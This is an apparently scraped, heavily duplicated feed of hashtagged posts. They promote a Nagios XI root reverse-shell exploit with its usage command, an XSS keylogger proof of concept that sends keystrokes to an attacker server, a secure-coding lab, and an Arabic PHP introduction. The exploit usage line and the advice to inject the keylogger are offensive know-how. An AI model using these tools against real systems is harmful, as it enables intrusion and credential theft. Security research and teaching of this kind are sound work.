nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
secDevLabs:-- A #laboratory for learning #secure #web #development in a #practical manner.
By provisioning local #environments via docker-compose, you will learn how the most #critical web #application #security risks are #exploited and how these #vulnerable codes can be fixed to mitigate them.
After forking this repository, you will find multiple intended vulnerable apps based on real-life scenarios in various languages such as #Golang, #Python and #PHP. A good start would be installing the ones you are most familiar with. You can find instructions to do this on each of the apps.
#Download #Link:-
https://github.com/globocom/secDevLabs
secDevLabs:-- A #laboratory for learning #secure #web #development in a #practical manner.
By provisioning local #environments via docker-compose, you will learn how the most #critical web #application #security risks are #exploited and how these #vulnerable codes can be fixed to mitigate them.
After forking this repository, you will find multiple intended vulnerable apps based on real-life scenarios in various languages such as #Golang, #Python and #PHP. A good start would be installing the ones you are most familiar with. You can find instructions to do this on each of the apps.
#Download #Link:-
https://github.com/globocom/secDevLabs
By provisioning local #environments via docker-compose, you will learn how the most #critical web #application #security risks are #exploited and how these #vulnerable codes can be fixed to mitigate them.
After forking this repository, you will find multiple intended vulnerable apps based on real-life scenarios in various languages such as #Golang, #Python and #PHP. A good start would be installing the ones you are most familiar with. You can find instructions to do this on each of the apps.
#Download #Link:-
https://github.com/globocom/secDevLabs
secDevLabs:-- A #laboratory for learning #secure #web #development in a #practical manner.
By provisioning local #environments via docker-compose, you will learn how the most #critical web #application #security risks are #exploited and how these #vulnerable codes can be fixed to mitigate them.
After forking this repository, you will find multiple intended vulnerable apps based on real-life scenarios in various languages such as #Golang, #Python and #PHP. A good start would be installing the ones you are most familiar with. You can find instructions to do this on each of the apps.
#Download #Link:-
https://github.com/globocom/secDevLabs
XSS-Keylogger PoC:-- A general #Javascript #keylogger to be used in an #XSS #PoC
This is a simple PoC JavaScript keylogger to attach to an XSS vulnerability disclosure. It is made up of two #PHP servers, one acts like the #victim and the other acts as the attacker's #remote #server.
In a disclosure, you would just need to copy the code between the script tags in the victims index.php file, remove all comments, minify and inject as you see fit (obviously making some adjustments to the target and remote variables);
How to Run:-
1. Turn on each of the servers separately using the shell scripts.
2. Open two #browser tabs, and navigate to each of these addresses:
Victim: http://127.0.0.1:8080
Attacker: http://127.0.0.1:8081
3. Then from the login page on the victim server, enter the following username and password:
Username: admin
Password: c0mpl1c@t3dp4ss
4. Once the form is submitted and you are welcomed by the home.php file open the attacker page.
5. Refresh the attacker page to see the #keystrokes and form data entered into the keystrokes field.
#Download #Link:-
https://github.com/jakemscott/XSS-Keylogger
XSS-Keylogger PoC:-- A general #Javascript #keylogger to be used in an #XSS #PoC
This is a simple PoC JavaScript keylogger to attach to an XSS vulnerability disclosure. It is made up of two #PHP servers, one acts like the #victim and the other acts as the attacker's #remote #server.
In a disclosure, you would just need to copy the code between the script tags in the victims index.php file, remove all comments, minify and inject as you see fit (obviously making some adjustments to the target and remote variables);
How to Run:-
1. Turn on each of the servers separately using the shell scripts.
2. Open two #browser tabs, and navigate to each of these addresses:
Victim: http://127.0.0.1:8080
Attacker: http://127.0.0.1:8081
3. Then from the login page on the victim server, enter the following username and password:
Username: admin
Password: c0mpl1c@t3dp4ss
4. Once the form is submitted and you are welcomed by the home.php file open the attacker page.
5. Refresh the attacker page to see the #keystrokes and form data entered into the keystrokes field.
#Download #Link:-
https://github.com/jakemscott/XSS-Keylogger
This is a simple PoC JavaScript keylogger to attach to an XSS vulnerability disclosure. It is made up of two #PHP servers, one acts like the #victim and the other acts as the attacker's #remote #server.
In a disclosure, you would just need to copy the code between the script tags in the victims index.php file, remove all comments, minify and inject as you see fit (obviously making some adjustments to the target and remote variables);
How to Run:-
1. Turn on each of the servers separately using the shell scripts.
2. Open two #browser tabs, and navigate to each of these addresses:
Victim: http://127.0.0.1:8080
Attacker: http://127.0.0.1:8081
3. Then from the login page on the victim server, enter the following username and password:
Username: admin
Password: c0mpl1c@t3dp4ss
4. Once the form is submitted and you are welcomed by the home.php file open the attacker page.
5. Refresh the attacker page to see the #keystrokes and form data entered into the keystrokes field.
#Download #Link:-
https://github.com/jakemscott/XSS-Keylogger
XSS-Keylogger PoC:-- A general #Javascript #keylogger to be used in an #XSS #PoC
This is a simple PoC JavaScript keylogger to attach to an XSS vulnerability disclosure. It is made up of two #PHP servers, one acts like the #victim and the other acts as the attacker's #remote #server.
In a disclosure, you would just need to copy the code between the script tags in the victims index.php file, remove all comments, minify and inject as you see fit (obviously making some adjustments to the target and remote variables);
How to Run:-
1. Turn on each of the servers separately using the shell scripts.
2. Open two #browser tabs, and navigate to each of these addresses:
Victim: http://127.0.0.1:8080
Attacker: http://127.0.0.1:8081
3. Then from the login page on the victim server, enter the following username and password:
Username: admin
Password: c0mpl1c@t3dp4ss
4. Once the form is submitted and you are welcomed by the home.php file open the attacker page.
5. Refresh the attacker page to see the #keystrokes and form data entered into the keystrokes field.
#Download #Link:-
https://github.com/jakemscott/XSS-Keylogger
ماهي لغة بي اتش بي #PHP
What is PHP programming language?
لغة php هي واحدة من أشهر #لغات_البرمجة التي يتم استخدامها في #إنشاء_مواقع_الويب و هي من اللغات التي يقوم #خادم_الويب بتفسير و تنفيذ الكود الخاص بها ثم يرسل النتيجة ليتم عرضها في متصفح المستخدم.
لقراءة الدرس #الاول في PHP من خلال الرابط الآتي :
https://www.nusurtech.ca/2024/03/php-overview.html
What is PHP programming language?
لغة php هي واحدة من أشهر #لغات_البرمجة التي يتم استخدامها في #إنشاء_مواقع_الويب و هي من اللغات التي يقوم #خادم_الويب بتفسير و تنفيذ الكود الخاص بها ثم يرسل النتيجة ليتم عرضها في متصفح المستخدم.
لقراءة الدرس #الاول في PHP من خلال الرابط الآتي :
https://www.nusurtech.ca/2024/03/php-overview.html